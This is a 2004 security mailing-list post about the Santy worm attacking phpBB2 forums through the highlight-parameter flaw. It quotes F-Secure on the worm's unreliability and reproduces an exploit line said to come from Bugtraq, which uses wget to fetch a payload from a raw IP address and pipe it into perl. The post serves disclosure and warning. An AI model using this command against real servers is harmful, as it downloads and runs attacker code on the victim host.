mailing list archives
RE: RE: Worm hitting PHPbb2 Forums
From: Paul Laudanski <zx () castlecops com>
Date: Thu, 23 Dec 2004 23:40:46 -0500 (EST)
On Thu, 23 Dec 2004, Patrick Nolan wrote:
A bot is not uploaded, not sure where that came from.
And by now, it is not expected to be spreading at all, thanks to the
interruption in search requests by Google.
There are a couple posts going on about this, for instance take this
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The
exploit it uses is only able to transfer around 20 bytes of data at a
time. So the worm transfers itself from one web site to another in small
"If a chunk gets missing, the worm might still work fine... or it might
fail," Hypponen told ComputerWire. "More generations there are, more
likely it is to fail because of this."
Compare that to an exploit that is posted @bugtraq:
rush=echo _START_; cd /tmp;wget 18.104.22.168/bn -O .b; perl -pe
.b| perl; rm -f .b *.pl b0t*; echo _END_
It is making use of the highlight exploit in pre phpbb 2.0.11.
Even though the 'worm' itself may be hindered, we can certainly expect
script kiddies to attempt these manually.
Now that is catching the single quote in the highlight argument.
Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
Full-Disclosure - We believe in it.